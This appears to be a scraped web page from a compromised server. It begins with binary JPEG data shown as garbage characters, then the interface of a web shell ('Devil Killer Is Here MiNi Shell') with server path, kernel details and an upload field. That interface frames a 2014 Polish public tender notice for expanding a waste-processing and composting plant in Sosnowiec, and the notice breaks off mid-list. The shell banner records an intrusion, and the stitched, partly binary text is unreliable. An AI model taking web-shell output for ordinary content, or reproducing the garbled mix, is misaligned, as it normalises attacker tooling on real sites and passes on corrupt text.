JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140217/53976-N-2014.html

<p class="kh_header"><b>Sosnowiec: Rozbudowa Zakładu Przetwarzania i Unieszkodliwiania Odpadów Komunalnych w Sosnowcu dla wypełnienia wymagań dla Regionalnej Instalacji Przetwarzania Odpadów Komunalnych</b><br>
<b>Numer ogłoszenia: 53976 - 2014; data zamieszczenia: 17.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Składowania Odpadów Spółka z ograniczoną odpowiedzialnością , ul. Grenadierów, skrytka pocztowa 86, 41-200 Sosnowiec, woj. śląskie, tel. 32 263 47 23, 263 88 91, faks 32 263 88 91.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzso.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Zakładu Przetwarzania i Unieszkodliwiania Odpadów Komunalnych w Sosnowcu dla wypełnienia wymagań dla Regionalnej Instalacji Przetwarzania Odpadów Komunalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach niniejszego zamówienia Zamawiający wymaga zaprojektowania i wykonania n/w zakresu: 
a. 6 modułów kompostowania odpadów ulegających biodegradacji wydzielonych z odpadów komunalnych zmieszanych, o przepustowości 13.000 Mg/rok wraz z pomieszczeniem wentylatorni,
b. placu intensywnego dojrzewania kompostu/stabilizatu (proces tlenowej stabilizacji II stopnia wstępnie ustabilizowanej frakcji 0-80 mm w modułach kompostowania odpadów ulegających biodegradacji) z przykryciem pryzm, instalacją sterującą, systemem napowietrzania i odbioru odcieków, o przepustowości 26.000 Mg/rok wraz z urządzeniem zwijającym/rozwijającym przykrycie, zainstalowanym na murze,
wraz z:
-kompletem instalacji technologicznych i sieci (wodociągowej, kanalizacji technologicznej, kanalizacji deszczowej, elektrycznej niskonapięciowej i słaboprądowych, elektrycznej oświetleniowej) zapewniających prawidłowe funkcjonowanie zakresu będącego przedmiotem niniejszego zamówienia oraz połączeniem z istniejącą infrastrukturą techniczną wykonaną w ramach Kontraktu 01,
-drogami i placami manewrowymi,
-zabezpieczaniem terenu budowy / inwestycji przed osuwaniem się skarp,
-zieleni ozdobnej i izolacyjnej,
-ogrodzeniem,
-inną niezbędną infrastrukturą techniczną konieczną do funkcjonowania przedmiotu niniejszego zamówienia
oraz 
-dostawą i montażem masztów flagowych wraz z flagami,
-opracowaniem i wydrukiem materiałów promocyjnych,
-dostawą narzędzi ręcznych oraz aparatury pomiarowej,
-dostawą wózków transportowych.

Zamówienie wykonywane będzie w oparciu o podręcznik WARUNKI KONTRAKTOWE dla Urządzeń oraz Projektowania i Budowy dla urządzeń elektrycznych i mechanicznych oraz robót inżynieryjnych i budowlanych projektowanych przez Wykonawcę- żółta książka, 4. Wydanie angielsko-polskie niezmienione 2008 z erratą (tłumaczenie 1. wydanie 1999) - ISBN 83-86774-28-2.

Wymaga się, aby zgodnie z zapisami zawartymi w Krajowym Planie Gospodarki Odpadami, przy budowie kompostowni, spełnione było kryterium BAT, a stosowana technologia zaproponowana do realizacji niniejszego zamówienia była sprawdzona poprzez wieloletnie i liczne doświadczenia 
W tym celu Wykonawca wypełni załącznik nr 6..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, zgodnie z art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2013.907 j.t z póź. zm.) stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju robót budowlanych jak w przedmiocie zamówienia określonym w Części III SIWZ.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.22.00.00-5, 45.22.20.00-9, 45.22.21.00-0, 71.31.00.00-4, 71.30.00.00-1, 71.32.00.00-7, 45.23.00.00-8, 45.23.14.00-9, 45.23.13.00-8, 45.23.16.00-1, 44.21.22.50-6, 51.12.20.00-3, 44.51.00.00-8, 31.72.00.00-9, 38.40.00.00-9, 79.82.00.00-8, 42.41.80.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 32.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 250.000,00 PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>n/d</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie muszą posiadać wiedzę i doświadczenie, tj. Wykonawca musi wykonać, w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 1 robotę budowlaną, polegającą na wykonaniu: Zaprojektowaniu i wybudowaniu instalacji do biologicznego przetwarzania odpadów komunalnych w systemie zamkniętym o przepustowości min. 10 000 Mg/rok, przeznaczonej do przetwarzania frakcji zawierających odpady ulegające biodegradacji wydzielonych z odpadów komunalnych pochodzących z gospodarstw domowych oraz dodatkowo odpadów organicznych (bio) i zielonych objętych selektywnym zbieraniem.
W celu oceny spełnienia przez Wykonawcę niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego załącznik nr 4 do IDW (Wykonawcy składający ofertę wspólną przedstawiają razem jeden dokument w formie załącznika nr 4 do IDW) z podaniem ich rodzaju, wartości daty i miejsca wykonania oraz załączyć dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami, o których mowa powyżej są:
-poświadczenie;
-inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
W przypadku gdy Zamawiający jest podmiotem na rzecz, którego roboty wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania ww. dowodów.
Ocena spełnienia niniejszego warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>n/d</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie muszą dysponować odpowiednimi osobami zdolnymi do wykonania zamówienia, (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie),tj. wskazać do uczestnictwa w wykonywaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wraz z informacją o podstawie do dysponowania tymi osobami:
Kierownik Zespołu(ekspert nr 1, 1 osoba) - odpowiedzialny za zagadnienia kontraktowe - niniejsza osoba ma posiadać następujące kwalifikacje:
-wyższe wykształcenie prawnicze lub ekonomiczne lub techniczne; 
-doświadczenie zawodowe na stanowisku kierowniczym dla przynajmniej dwóch inwestycji, w tym jednej w gospodarce odpadami komunalnymi;
Główny Projektant(ekspert nr 2, 1 osoba) - niniejsza osoba ma posiadać następujące kwalifikacje:
-doświadczenie w sporządzeniu co najmniej 1 dokumentacji projektowej pełniąc funkcję Kierownika Zespołu Projektowego, obejmującej wykonanie projektu budowlanego i wykonawczego dla instalacji kompostowania intensywnego w systemie zamkniętym o przepustowości min 10 000 Mg/rok;
-stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej projektanta w specjalności konstrukcyjno - budowlanej lub architektonicznej w zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały wydane zgodnie z  obowiązującym prawem.
Kierownik budowy (ekspert nr 3, 1 osoba) - niniejsza osoba ma posiadać następujące kwalifikacje:
-doświadczenie zawodowe jako kierownik budowy lub kierownik robót konstrukcyjno-budowlanych przy realizacji dwóch obiektów w konstrukcji żelbetowej;
-stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej kierownika robót w specjalności konstrukcyjno - budowlanej w zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały wydane zgodnie z obowiązującym prawem.
Kierownik Robót Elektrycznych - (ekspert nr 4, 1 osoba) - niniejsza osoba ma posiadać następujące kwalifikacje:
-doświadczenie zawodowe na stanowisku kierownika robót elektrycznych dla przynajmniej dwóch inwestycji;
-stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały wydane zgodnie z obowiązującym prawem.
Kierownik Robót Drogowych - (ekspert nr 5, 1 osoba) - niniejsza osoba ma posiadać następujące kwalifikacje:
-doświadczenie zawodowe na stanowisku kierownika robót drogowych dla przynajmniej dwóch inwestycji;
-stosowne uprawnienia, które upoważniają do pełnienia samodzielnej funkcji technicznej kierownika robót w specjalności drogowej w zakresie niezbędnym do realizacji przedmiotu zamówienia, które zostały wydane zgodnie z obowiązującym prawem.
Specjalista ds. rozruchu instalacji kompostowania (ekspert nr 6, 1 osoba) niniejsza osoba ma posiadać następujące kwalifikacje:
-wykształcenie wyższe techniczne; 
-doświadczenie w uruchamianiu i rozruchu instalacji technologicznej do kompostowania intensywnego odpadów komunalnych w systemie zamkniętym o przepustowości min. 10 000 Mg/rok.
W przypadku, gdy ww. osoby, biorące udział w realizacji zamówienia, nie znają języka polskiego wymagane jest, aby Wykonawca zapewnił pełną usługę tłumaczenia na i z języka polskiego.
Wymieniony powyżej personel kluczowy nie wyczerpuje wymagań dla rzetelnego wypełnienia zobowiązań Wykonawcy i winien być traktowany jako minimalne wymogi Zamawiającego. 
W celu oceny spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacji o podstawie do dysponowania tymi osobami sporządzony według wzoru stanowiącego załącznik nr 3 do IDW oraz złożyć oświadczenie, stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, a w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ocena spełnienia niniejszego warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie publiczne muszą znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. 
W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa): tj. posiadać środki finansowe w wysokości co najmniej 3.500.000,00 PLN lub posiadać zdolność kredytową  w  wysokości co najmniej 3.500.000,00 PLN. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty, przez tego/tych wykonawcę/wykonawców, który/którzy spełnia/spełniają warunek).
Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, a w szczególności przedstawi w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca, wykazując spełnienie powyższego warunku polega na zdolnościach finansowych innych podmiotów, wymaga się przedłożenia ww. informacji dotyczącej tych podmiotów.
Ocena spełnienia niniejszego warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt. 9 IDW. Ponadto tacy Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. 
3. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, są zobowiązani przedłożyć  Zamawiającemu , przed zawarciem umowy w sprawie zamówienia publicznego, stosowne porozumienie lub umowę zawierające w swojej treści następujące postanowienia:
1) związanie porozumieniem lub umową na czas nie krótszy niż czas trwania umowy dotyczącej niniejszego zamówienia publicznego wraz z okresem rękojmi za wady,
